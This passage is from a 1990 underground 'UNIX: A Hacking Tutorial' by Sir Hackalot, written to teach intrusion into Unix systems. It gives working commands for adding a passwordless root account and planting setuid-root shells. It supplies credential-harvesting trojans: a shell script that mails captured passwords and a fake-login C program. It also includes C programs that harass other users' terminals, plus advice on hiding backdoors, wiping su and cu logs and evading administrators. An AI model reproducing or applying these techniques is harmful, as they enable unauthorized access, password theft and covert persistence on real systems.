TheLib.Ru » ОС и Сети » Hackalot S » UNIX: A Hacking Tutorial. 1990 » онлайн-чтение (стр. 2)

 

 

as well as other ethernet/x.25 link programs.

/usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in
Several directories, but it is usually in /usr/adm. This file
is what it sounds like. Its a log file, for the program SU.
What it is for is to keep a record of who uses SU and when.
whenever you use SU, your best bet would be to edit this file
if possible, and I'll tell you how and why in the section
about using "su".

/usr/adm/loginlog
or /usr/adm/acct/loginlog -
This is a log file, keeping track of the logins.
Its purpose is merely for accounting and "security review". Really,
sometimes this file is never found, since a lot of systems keep the
logging off.

/usr/adm/errlog
or errlog - This is the error log. It could be located anywhere. It
keeps track of all serious and even not so serious errors.
Usually, it will contain an error code, then a situation.
the error code can be from 1-10, the higher the number, the
worse the error. Error code 6 is usually used when you try
to hack. "login" logs your attempt in errlog with error code
6. Error code 10 means, in a nutshell, "SYSTEM CRASH".

/usr/adm/culog - This file contains entries that tell when you used cu,
where you called and so forth. Another security thing.

/usr/mail/ - this is where the program "mail" stores its mail.
to read a particular mailbox, so they are called,
you must be that user, in the user group "mail" or
root. each mailbox is just a name. for instance,
if my login was "sirhack" my mail file would usually
be: /usr/mail/sirhack

/usr/lib/cron/crontabs - This contains the instructions for cron, usually.
Will get into this later.

/etc/shadow - A "shadowed" password file. Will talk about this later.


-- The BIN account --

Well, right now, I'd like to take a moment to talk about the account
"bin". While it is only a user level account, it is very powerful. It is
the owner of most of the files, and on most systems, it owns /etc/passwd,
THE most important file on a unix. See, the bin account owns most of the
"bin" (binary) files, as well as others used by the binary files, such
as login. Now, knowing what you know about file permissions, if bin owns
the passwd file, you can edit passwd and add a root entry for yourself.
You could do this via the edit command:
$ ed passwd
10999 [The size of passwd varies]
* a
sirhak::0:0:Mr. Hackalot:/:/bin/sh
{control-d}
* w
* q
$
Then, you could say: exec login, then you could login as sirhack, and
you'd be root.

/\/\/\/\/\/\/\/\/
Hacking..........
/\/\/\/\/\/\/\/\/

--------------

    Account Adding


--------------

There are other programs that will add users to the system, instead
of ed. But most of these programs will NOT allow a root level user to be
added, or anything less than a UID of 100. One of these programs is
named "adduser". Now, the reason I have stuck this little section in, is
for those who want to use a unix for something useful. Say you want a
"mailing address". If the unix has uucp on it, or is a big college,
chances are, it will do mail transfers. You'll have to test the unix
by trying to send mail to a friend somewhere, or just mailing yourself.
If the mailer is identified as "smail" when you mail yourself (the program
name will be imbedded in the message) that probably means that the system
will send out UUCP mail. This is a good way to keep in contact with people.
Now, this is why you'd want a semi-permanent account. The way to achieve this
is by adding an account similar to those already on the system. If all the
user-level accounts (UID >= 100) are three letter abbriviations, say
"btc" for Bill The Cat, or "brs" for bill ryan smith, add an account
via adduser, and make a name like sally jane marshall or something
(they don't expect hackers to put in female names) and have the account
named sjm. See, in the account description (like Mr. Hackalot above), that
is where the real name is usually stored. So, sjm might look like this:
sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh
Of course, you will password protect this account, right?
Also, group id's don't have to be above 100, but you must put the account
into one that exists. Now, once you login with this account, the first
thing you'd want to do is execute "passwd" to set a password up. If you
don't, chances are someone else 'll do it for you (Then you'll be SOL).

-------------------

    Set The User ID


-------------------

This is porbably one of the most used schemes. Setting up an "UID-
Shell". What does this mean? Well, it basically means you are going
to set the user-bit on a program. The program most commonly used is
a shell (csh,sh, ksh, etc). Why? Think about it: You'll have access
to whatever the owner of the file does. A UID shell sets the user-ID of
the person who executes it to the owner of the program. So if root
owns a uid shell, then you become root when you run it. This is an
alternate way to become root.

Say you get in and modify the passwd file and make a root level
account unpassworded, so you can drop in. Of course, you almost HAVE to
get rid of that account or else it WILL be noticed eventually. So, what
you would do is set up a regular user account for yourself, then, make
a uid shell. Usually you would use /bin/sh to do it. After adding
the regular user to the passwd file, and setting up his home directory,
you could do something like this:
(assume you set up the account: shk)
# cp /bin/sh /usr/shk/runme
# chmod a+s /usr/shk/runme

Thats all there would be to it. When you logged in as shk, you could just
type in:

$ runme
#

See? You'd then be root. Here is a thing to do:

$ id
uid=104(shk) gid=50(user)

$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#

The euid is the "effective" user ID. UID-shells only set the effective
userid, not the real user-id. But, the effective user id over-rides the
real user id. Now, you can, if you wanted to just be annoying, make
the utilities suid to root. What do I mean? For instance, make 'ls'
a root 'shell'. :

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
..
......
etc crap

Ls would then be able to pry into ANY directory. If you did the same to
"cat" you could view any file. If you did it to rm, you could delete any
file. If you did it to 'ed', you could edit any-file (nifty!), anywhere on
the system (usually).


    How do I get root?


------------------

Good question indeed. To make a program set the user-id shell to root,
you have to be root, unless you're lucky. What do I mean? Well, say
you find a program that sets the user-id to root. If you have access
to write to that file, guess what? you can copy over it, but keep
the uid bit set. So, say you see that the program chsh is setting
the user id too root. You can copy /bin/sh over it.

$ ls -l
rwsrwsrws root other 10999 Jan 4 chsh
$ cp /bin/sh chsh
$ chsh
#

See? That is just one way. There are others, which I will now talk
about.

    More on setting the UID


-----------------------

Now, the generic form for making a program set the User-ID bit
is to use this command:

chmod a+s file

Where 'file' is a valid existing file. Now, only those who own the file
can set the user ID bit. Remember, anything YOU create, YOU own, so if
you copy th /bin/sh, the one you are logged in as owns it, or IF the
UID is set to something else, the New UID owns the file. This brings
me to BAD file permissions.



II. HACKING : Bad Directory Permissions

Now, what do I mean for bad directory permissions? Well, look for
files that YOU can write to, and above all, DIRECTORIES you can write to.
If you have write permissions on a file, you can modify it. Now, this comes
in handy when wanting to steal someone's access. If you can write to
a user's .profile, you are in business. You can have that user's .profile
create a suid shell for you to run when You next logon after the user.
If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$

Now, when the user next logs on, the .profile will create .runme which
will set your ID to the user whose .profile you changed. Ideally, you'll
go back in and zap those lines after the suid is created, and you'll create
a suid somewhere else, and delete the one in his dir. The .runme will
not appear in the user's REGULAR directory list, it will only show up
if he does "ls -a" (or ls with a -a combination), because, the '.' makes
a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused
method of gaining more power on a unix. The above could be done in C via
the system() command, or by just plain using open(), chmod(), and the like.
* Remember to check and see if the root user's profile is writeable *
* it is located at /.profile (usually) *


The BEST thing that could happen is to find a user's directory writeable
by you. Why? well, you could replace all the files in the directory
with your own devious scripts, or C trojans. Even if a file is not
writeable by you, you can still overwrite it by deleteing it. If you
can read various files, such as the user's .profile, you can make a
self deleting trojan as so:

$ cp .profile temp.pro
$ ed .profile
1234
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
mv temp.pro .profile
(control-d)
? w
[another number]
? q
$ chown that_user temp.pro
What happens is that you make a copy of the .profile before you change it.
Then, you change the original. When he runs it, the steps are made, then
the original version is placed over the current, so if the idiot looks in
his .profile, he won't see anything out of the ordinary, except that he
could notice in a long listing that the change date is very recent, but
most users are not paranoid enough to do extensive checks on their files,
except sysadm files (such as passwd).

Now, remember, even though you can write to a dir, you may not be able
to write to a file without deleting it. If you do not have write perms
for that file, you'll have to delete it and write something in its place
(put a file with the same name there). The most important thing to remember
if you have to delete a .profile is to CHANGE the OWNER back after you
construct a new one (hehe) for that user. He could easily notice that his
.profile was changed and he'll know who did it. YES, you can change the
owner to someone else besides yourself and the original owner (as to throw
him off), but this is not wise as keeping access usually relies on the fact
that they don't know you are around.

You can easily change cron files if you can write to them. I'm not going
to go into detail about cronfile formats here, just find the crontab files
and modify them to create a shell somewhere as root every once in a while,
and set the user-id.

III. Trojan Horses on Detached terminals.
Basically this: You can send garbage to a user's screen and
mess him up bad enough to force a logoff, creating a detached
account. Then you can execute a trojan horse off that terminal in
place of login or something, so the next one who calls can hit the
trojan horse. This USUALLY takes the form of a fake login and
write the username/pw entererred to disk.

Now, there are other trojan horses available for you to write. Now,
don't go thinking about a virus, for they don't work unless ROOT runs
them. Anyway, a common trjan would be a shell script to get the
password, and mail it to you. Now, you can replace the code for
the self deleting trojan with one saying something like:
echo "login: \c"
read lgin
echo off (works on some systems)
(if above not available...: stty -noecho)
echo "Password:\c"
read pw
echo on
echo "Login: $lgin - Pword: $pw" | mail you

Now, the best way to use this is to put it in a seperate script file
so it can be deleted as part of the self deleting trojan. A quick
modification, removing the "login: " and leaving the password
may have it look like SU, so you can get the root password. But
make sure the program deletes itself. Here is a sample trojan
login in C:

#include
/* Get the necessary defs.. */
main()
{
char *name[80];
char *pw[20];
FILE *strm;
printf("login: ");
gets(name);
pw = getpass("Password:");
strm = fopen("/WhereEver/Whateverfile","a");
fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
fclose(strm);
/* put some kind of error below... or something... */
printf("Bus Error - Core Dumped\n");
exit(1);
}

The program gets the login, and the password, and appends it to
a file (/wherever/whateverfile), and creates the file if it can,
and if its not there. That is just an example. Network Annoyances
come later.

    IV. Odd systems



There may be systems you can log in to with no problem, and find some
slack menu, database, or word processor as your shell, with no way to the
command interpreter (sh, ksh, etc..). Don't give up here. Some systems will
let you login as root, but give you a menu which will allow you to add an
account. However, ones that do this usually have some purchased software
package running, and the people who made the software KNOW that the people
who bought it are idiots, and the thing will sometimes only allow you to
add accounts with user-id 100 or greater, with their special menushell as
a shell. You probably won't get to pick the shell, the program will probably
stick one on the user you created which is very limiting. HOWEVER, sometimes
you can edit accounts, and it will list accounts you can edit on the screen.
HOWEVER, these programs usually only list those with UIDS > 100 so you don't
edit the good accounts, however, they donot stop you from editing an account
with a UID < 100. The "editing" usually only involves changing the password
on the account. If an account has a * for a password, the standard passwd
program which changes programs, will say no pw exists, and will ask you to
enter one. (wallah! You have just freed an account for yourself. Usually
bin and sys have a * for a password). If one exists you'll have to enter
the old Password (I hope you know it!) for that account. Then, you are
in the same boat as before. (BTW -- These wierd systems are usually
Xenix/386, Xenix/286, or Altos/286)
With word processors, usually you can select the load command,
and when the word processor prompts for a file, you can select the passwd
file, to look for open accounts, or at least valid ones to hack. An example
would be the informix system. You can get a word processor with that such
as Samna word, or something, and those Lamers will not protect against
shit like that. Why? The Passwd file HAS to be readable by all for the most
part, so each program can "stat" you. However, word processors could be made
to restrict editing to a directory, or set of directories. Here is an
example:

$ id
uid=100(sirhack) gid=100(users)
$ sword
(word processor comes up)
(select LOAD A FILE)
: /etc/passwd

(you see: )
root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
sirhack:dld!k%%?%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
...

Now I have found an account to take over! "datawiz" will get me in with no
trouble, then I can change his password, which he will not like at all.
Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions
of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which
will menu drive all the important shit, even creating users, but you must
have ansi or something.

You can usually tell when you'll get a menu. Sometimes on UNIX
SYSTEM V, when it says TERM = (termtype), and is waiting for
you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files
Not much to say about this. all it is, is when every password field
in the password file has an "x" or just a single character. What
that does is screw you, becuase you cannot read the shadowed password
file, only root can, and it contains all the passwords, so you will
not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from
writing assembly code that modifies the PCB through self-changing code which
the interrupt handler doesn't catch, and things like that. However, I do
not want to give away everything, and this was not meant for advanced Unix
Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix
assembly language or anything. Now I will Talk about Internet.



--->>> InterNet <<<---
Why do I want to talk about InterNet? Well, because it is a prime
example of a TCP/IP network, better known as a WAN (Wide-Area-Network).
Now, mainly you will find BSD systems off of the Internet, or SunOS, for
they are the most common. They may not be when System V, Rel 4.0, Version
2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jump
from one computer to another once you are logged in. What happens is
EACH system has a "yello page password file". Better known as yppasswd.
If you look in there, and see blank passwords you can use rsh, rlogin, etc..
to slip into that system. One system in particular I came across had a
a yppasswd file where *300* users had blank passwords in the Yellow Pages.
Once I got in on the "test" account, ALL I had to do was select who I wanted
to be, and do: rlogin -l user (sometimes -n). Then it would log me onto
the system I was already on, through TCP/IP. However, when you do this,
remember that the yppasswd only pertains to the system you are on at
the time. To find accounts, you could find the yppasswd file and do:

% cat yppasswd | grep ::

Or, if you can't find yppasswd..

% ypcat passwd | grep ::

On ONE system (which will remain confidential), I found the DAEMON account
left open in the yppasswd file. Not bad. Anyway, through one system
on the internet, you can reach many. Just use rsh, or rlogin, and look
in the file: /etc/hosts for valid sites which you can reach. If you get
on to a system, and rlogin to somewhere else, and it asks for a password,
that just means one of two things:

A. Your account that you have hacked on the one computer is on the target
computer as well. Try to use the same password (if any) you found the
hacked account to have. If it is a default, then it is definitly on the
other system, but good luck...

B. rlogin/rsh passed your current username along to the remote system, so it
was like typing in your login at a "login: " prompt. You may not exist on
the other machine. Try "rlogin -l login_name", or rlogin -n name..
sometimes, you can execute "rwho" on another machine, and get a valid
account.

Some notes on Internet servers. There are "GATEWAYS" that you can get into
that will allow access to MANY internet sites. They are mostly run off
a modified GL/1 or GS/1. No big deal. They have help files. However,
you can get a "privilged" access on them, which will give you CONTROL of
the gateway.. You can shut it down, remove systems from the Internet, etc..
When you request to become privileged, it will ask for a password. There is
a default. The default is "system". I have come across *5* gateways with
the default password. Then again, DECNET has the same password, and I have
come across 100+ of those with the default privileged password. CERT Sucks.
a Gateway that led to APPLE.COM had the default password. Anyone could
have removed apple.com from the internet. Be advised that there are many
networks now that use TCP/IP.. Such as BARRNET, LANET, and many other
University networks.

--** Having Fun **--

Now, if nothing else, you should atleast have some fun. No, I do not mean
go trashing hardrives, or unlinking directories to take up inodes, I mean
play with online users. There are many things to do. Re-direct output
to them is the biggie. Here is an example:
$ who
loozer tty1
sirhack tty2
$ banner You Suck >/dev/tty1
$
That sent the output to loozer. The TTY1 is where I/O is being performed
to his terminal (usually a modem if it is a TTY). You can repetitiously
banner him with a do while statement in shell, causing him to logoff. Or
you can get sly, and just screw with him. Observe this C program:

#include
#include
#include

main(argc,argument)
int argc;
char *argument[];
{
int handle;
char *pstr,*olm[80];
char *devstr = "/dev/";
int acnt = 2;
FILE *strm;
pstr = "";
if (argc == 1) {
printf("OL (OneLiner) Version 1.00 \n");
printf("By Sir Hackalot [PHAZE]\n");
printf("\nSyntax: ol tty message\n");
printf("Example: ol tty01 You suck\n");
exit(1);
}
printf("OL (OneLiner) Version 1.0\n");
printf("By Sir Hackalot [PHAZE]\n");
if (argc == 2) {
strcpy(olm,"");
? printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n");
printf("Enter one Here => ");
gets(olm);
}
strcpy(pstr,"");
strcat(pstr,devstr);
strcat(pstr,argument[1]);
printf("Sending to: [%s]\n",pstr);
strm = fopen(pstr,"a");
if (strm == NULL) {
printf("Error writing to: %s\n",pstr);
printf("Cause: No Write Perms?\n");
exit(2);
}
if (argc == 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from
(%s): \n",logname());
fprintf(strm,"%s\n",olm);
fclose(strm);
printf("Message Sent.\n");
exit(0);
}
if (argc > 2) {
if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from
(%s):\n",logname());
while (acnt <= argc - 1) {
fprintf(strm,"%s ",argument[acnt]);
acnt++;
}
fclose(strm);
printf("Message sent!\n");
exit(0);
}
}

What the above does is send one line of text to a device writeable by you
in /dev. If you try it on a user named "sirhack" it will notify sirhack
of what you are doing. You can supply an argument at the command line, or
leave a blank message, then it will prompt for one. You MUST supply a
Terminal. Also, if you want to use ?, or *, or (), or [], you must not
supply a message at the command line, wait till it prompts you. Example:

$ ol tty1 You Suck!
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Sending to: [/dev/tty1]
Message Sent!
$
Or..
$ ol tty1
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Dummy! You Forgot to Supply a ONE LINE MESSAGE!
Enter one here => Loozer! Logoff (NOW)!! ?G?G
Sending to: [/dev/tty1]
Message Sent!
$

You can even use it to fake messages from root. Here is another:


/*
* Hose another user
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define NMAX sizeof(ubuf.ut_name)

struct utmp ubuf;
struct termio oldmode, mode;
struct utsname name;
int yn;
int loop = 0;
char *realme[50] = "Unknown";
char *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];
char *histtya, *ttyname(), *strrchr(), *getenv();
int signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();
FILE *tf;

main(argc, argv)
int argc;
char *argv[];
{
register FILE *uf;
char c1, lastc;
int goodtty = 0;
long clock = time((long *) 0);
struct tm *localtime();
struct tm *localclock = localtime( &clock );
struct stat stbuf;
char psbuf[20], buf[80], window[20], junk[20];
?
FILE *pfp, *popen();

if (argc < 2) {
printf("usage: hose user [ttyname]\n");
exit(1);
}
him = argv[1];

if (argc > 2)
histtya = argv[2];
if ((uf = fopen("/etc/utmp", "r")) == NULL) {
printf("cannot open /etc/utmp\n");
exit(1);
}
cuserid(me);
if (me == NULL) {
printf("Can't find your login name\n");
exit(1);
}
mytty = ttyname(2);
if (mytty == NULL) {
printf("Can't find your tty\n");
exit(1);
}
if (stat(mytty, &stbuf) < 0) {
printf("Can't stat your tty -- This System is bogus.\n");
}
if ((stbuf.st_mode&02) == 0) {
printf("You have write permissions turned off (hehe!).\n");
}

if (histtya) {
if (!strncmp(histtya, "/dev/", 5))
histtya = strrchr(histtya, '/') + 1;
strcpy(histty, "/dev/");
strcat(histty, histtya);
}
while (fread((char *)&ubuf, sizeof(ubuf), 1, uf) == 1) {
if (ubuf.ut_name[0] == '\0')
continue;
if (!strncmp(ubuf.ut_name, him, NMAX)) {
? logcnt++;
? if (histty[0]==0) {
strcpy(histty, "/dev/");
strcat(histty, ubuf.ut_line);
}
if (histtya) {
if (!strcmp(ubuf.ut_line, histtya))
goodtty++;
}
}
}
fclose(uf);
if (logcnt==0) {
printf("%s not found! (Not logged in?)\n", him);
exit(1);
}

if (histtya==0 && logcnt > 1) {
printf("%s logged more than once\nwriting to %s\n", him, histty+5);
}
if (access(histty, 0) < 0) {
printf("No such tty? [%s]\n",histty);
?? exit(1);
? }
signal(SIGALRM, timout);
alarm(5);
if ((tf = fopen(histty, "w")) == NULL)
goto perm;
alarm(0);
if (fstat(fileno(tf), &stbuf) < 0)
goto perm;
if (geteuid() != 0 && (stbuf.st_mode&02) == 0)
goto perm;
ioctl(0, TCGETA, &oldmode); /* save tty state */
ioctl(0, TCGETA, &mode);
sigs(eof);
uname(&name);
if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1;
if (yn == 1 ) {
fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me);
fclose(tf);
printf("Critical Error Handler: %s running conflicting process\n",him);
exit(1);
}
fflush(tf);
mode.c_cc[4] = 1;
mode.c_cc[5] = 0;
mode.c_lflag &= ~ICANON;
ioctl(0, TCSETAW, &mode);
lastc = '\n';


printf("Backspace / Spin Cursor set lose on: %s\n",him);
while (loop == 0) {
c1 = '\b';
write(fileno(tf),&c1,1);
sleep(5);
fprintf(tf,"\\\b|\b/\b-\b+\b");
fflush(tf);
}




perm:
printf("Write Permissions denied!\n");
exit(1);
}

timout()
{

printf("Timeout opening their tty\n");
exit(1);
}

eof()
{
printf("Bye..\n");
ioctl(0, TCSETAW, &oldmode);
exit(0);
}

ex()
{
register i;
sigs(SIG_IGN);
i = fork();
if (i < 0) {
printf("Try again\n");
goto out;
}
if (i == 0) {
sigs((int (*)())0);
execl(getenv("SHELL")?getenv("SHELL"):"/bin/sh","sh","-t",0);
exit(0);
}
while(wait((int *)NULL) != i)
;
printf("!\n");
out:
sigs(eof);
}

sigs(sig)
int (*sig)();
{
register i;
for (i=0; signum[i]; i++)
signal(signum[i], sig);
}



What the above is, is a modified version of the standard write command.
What it does, is spin the cursor once, then backspace once over the
screen of the user it is run on. All though, it does not physically affect
input, the user thinks it does. therefore, he garbles input. The sleep(xx)
can be changed to make the stuff happen more often, or less often.
If you put your login name in the "YOURNAMEHERE" slot, it will protect you
from getting hit by it, if someone off a Public access unix leeches the
executable from your directory.
You could make a shorter program that does almost the same thing, but
you have to supply the terminal, observe:

/* Backspace virus, by Sir Hackalot [Phaze] */
#include
#include
main(argc,argv)
char *argv[];
int argc;
{
int x = 1;
char *device = "/dev/";
FILE *histty;
if (argc == 1) {
printf("Bafoon. Supply a TTY.\n");
exit(1);
}
strcat(device,argv[1]);
/* Make the filename /dev/tty.. */
histty = fopen(device,"a");
if (histty == NULL) {
printf("Error opening/writing to tty. Check their perms.\n");
exit(1);
}
printf("BSV - Backspace virus, By Sir Hackalot.\n");
printf("The Sucker on %s is getting it!\n",device);
while (x == 1) {
fprintf(histty,"\b\b");
fflush(histty);
sleep(5);
}
}

Thats all there is to it. If you can write to their tty, you can use this on
them. It sends two backspaces to them every approx. 5 seconds. You
should run this program in the background. (&). Here is an example:

$ who
sirhack tty11
loozer tty12
$ bsv tty12&
[1] 4566
BSV - Backspace virus, by Sir Hackalot
The Sucker on /dev/tty12 is getting it!
$

Now, it will keep "attacking" him, until he loggs of, or you kill the process
(which was 4566 -- when you use &, it gives the pid [usually]).

** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF
method to terminate a line. However, the LF terminates a line in Unix.
you must STRIP CR's on an ascii upload if you want something you upload
to an editor to work right. Else, you'll see a ?M at the end of every
line. I know that sucks, but you just have to compensate for it.

I have a number of other programs that annoy users, but that is enough to
get your imagination going, provided you are a C programmer. You can annoy
users other ways. One thing you can do is screw up the user's mailbox.
The way to do this is to find a binary file (30k or bigger) on the system
which YOU have access to read. then, do this:

$ cat binary_file | mail loozer

or

$ mail loozer < binary file

That usually will spilt into 2 messages or more. The 1st message will
have a from line.. (from you ..), but the second WILL NOT! Since it does
not, the mail reader will keep exiting and giving him an error message until
it gets fixed.. The way to fix it is to go to the mail box that got hit
with this trick (usually only the one who got hit (or root) and do this),
and edit the file, and add a from line.. like
>From username..

then it will be ok. You can screw the user by "cat"ing a binary to his tty.
say Loozer is on tty12. You can say..
$ cat binary_file >/dev/tty12
$
It may pause for a while while it outputs it. If you want to resume what
you were doing instantly, do:
$ cat binary_file >/dev/tty12&
[1] 4690
$
And he will probably logoff. You can send the output of anything to his
terminal. Even what YOU do in shell. Like this:
$ sh >/dev/tty12
$
You'll get your prompts, but you won't see the output of any commands, he
will...
$ ls
$ banner Idiot!
$ echo Dumbass!
$
until you type in exit, or hit ctrl-d.


There are many many things you can do. You can fake a "write" to someone
and make them think it was from somewhere on the other side of hell. Be
creative.

When you are looking for things to do, look for holes, or try to get
someone to run a trojan horse that makes a suid shell. If you get
someone to run a trojan that does that, you can run the suid, and log their
ass off by killing their mother PID. (kill -9 whatever). Or, you can
lock them out by adding "kill -1 0" to their .profile. On the subject of
holes, always look for BAD suid bits. On one system thought to be invincible
I was able to read/modify everyone's mail, because I used a mailer that had
both the GroupID set, and the UserID set. When I went to shell from it,
the program instantly changed my Effective ID back to me, so I would not be
able to do anything but my regular stuff. But it was not designed to change
the GROUP ID back. The sysop had blundered there. SO when I did an ID
I found my group to be "Mail". Mailfiles are readble/writeable by the
user "mail", and the group "mail". I then set up a sgid (set group id) shell
to change my group id to "mail" when I ran it, and scanned important mail,
and it got me some good info. So, be on the look out for poor permissions.

Also, after you gain access, you may want to keep it. Some tips on doing so
is:
1. Don't give it out. If the sysadm sees that joeuser logged in 500
times in one night....then....
2. Don't stay on for hours at a time. They can trace you then. Also
they will know it is irregular to have joeuser on for 4 hours
after work.
3. Don't trash the system. Don't erase important files, and don't
hog inodes, or anything like that. Use the machine for a specific
purpose (to leech source code, develop programs, an Email site).
Dont be an asshole, and don't try to erase everything you can.
4. Don't screw with users constantly. Watch their processes and
run what they run. It may get you good info (snoop!)
5. If you add an account, first look at the accounts already in there
If you see a bunch of accounts that are just 3 letter abbrv.'s,
then make yours so. If a bunch are "cln, dok, wed" or something,
don't add one that is "joeuser", add one that is someone's
full initials.

6. When you add an account, put a woman's name in for the
description, if it fits (Meaning, if only companies log on to the
unix, put a company name there). People do not suspect hackers
to use women's names. They look for men's names.
7. Don't cost the Unix machine too much money. Ie.. don't abuse an
outdial, or if it controls trunks, do not set up a bunch of dial
outs. If there is a pad, don't use it unless you NEED it.
8. Don't use x.25 pads. Their usage is heavily logged.
9. Turn off acct logging (acct off) if you have the access to.
Turn it on when you are done.
10. Remove any trojan horses you set up to give you access when you
get access.
11. Do NOT change the MOTD file to say "I hacked this system" Just
thought I'd tell you. Many MANY people do that, and lose access
within 2 hours, if the unix is worth a spit.
12. Use good judgement. Cover your tracks. If you use su, clean
up the sulog.
13. If you use cu, clean up the cu_log.
14. If you use the smtp bug (wizard/debug), set up a uid shell.
15. Hide all suid shells. Here's how:
goto /usr
(or any dir)
do:
# mkdir ".. "
# cd ".. "
# cp /bin/sh ".whatever"
# chmod a+s ".whatever"
The "" are NEEDED to get to the directory .. ! It will not show
up in a listing, and it is hard as hell to get to by sysadms if
you make 4 or 5 spaces in there (".. "), because all they will
see in a directory FULL list will be .. and they won't be able to
get there unless they use "" and know the spacing. "" is used
when you want to do literals, or use a wildcard as part of a file
name.
16. Don't hog cpu time with password hackers. They really don't work
well.

17. Don't use too much disk space. If you archieve something to dl,
dl it, then kill the archieve.
18. Basically -- COVER YOUR TRACKS.

Some final notes:

Now, I hear lots of rumors and stories like "It is getting harder to get
into systems...". Wrong. (Yo Pheds! You reading this??). It IS true
when you are dealing with WAN's, such as telenet, tyment, and the Internet,
but not with local computers not on those networks. Here's the story:

Over the past few years, many small companies have sprung up as VARs
(Value Added Resellers) for Unix and Hardware, in order to make a fast
buck. Now, these companies fast talk companies into buying whatever,
and they proceed in setting up the Unix. Now, since they get paid by
the hour usaually when setting one up, they spread it out over days....
during these days, the system is WIDE open (if it has a dialin). Get
in and add yourself to passwd before the seal it off (if they do..).
Then again, after the machine is set up, they leave the defaults on the
system. Why? The company needs to get in, and most VARs cannot use
unix worth a shit, all they know how to do is set it up, and that is ALL.
Then, they turn over the system to a company or business that USUALLY
has no-one that knows what they hell they are doing with the thing, except
with menus. So, they leave the system open to all...(inadvertedly..),
because they are not competant. So, you could usually get on, and create
havoc, and at first they will think it is a bug.. I have seen this
happen ALL to many times, and it is always the same story...
The VAR is out for a fast buck, so they set up the software (all they know
how to do), and install any software packages ordered with it (following
the step by step instructions). Then they turn it over to the business
who runs a word processor, or database, or something, un aware that a
"shell" or command line exists, and they probably don't even know root does.
So, we will see more and more of these pop up, especially since AT&T is
now bundling a version of Xwindows with their new System V, and Simultask...
which will lead to even more holes. You'll find systems local to you
that are easy as hell to get into, and you'll see what I mean. These
VARs are really actually working for us. If a security problem arises
that the business is aware of, they call the VAR to fix it... Of course,
the Var gets paid by the hour, and leaves something open so you'll get in
again, and they make more moolahhhh.


You can use this phile for whatever you want. I can't stop you. Just
to learn unix (heh) or whatever. But its YOUR ass if you get caught.
Always consider the penalties before you attempt something. Sometimes
it is not worth it, Sometimes it is.

This phile was not meant to be comprehensive, even though it may seem like
it. I have left out a LOT of techniques, and quirks, specifically to get
you to learn SOMETHING on your own, and also to retain information so
I will have some secrets. You may pass this file on, UNMODIFIED, to any
GOOD H/P BBS. Sysops can add things to the archieve to say where
it was DL'd from, or to the text viewer for the same purpose. This is
Copywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.

-Sir Hackalot of PHAZE
1990.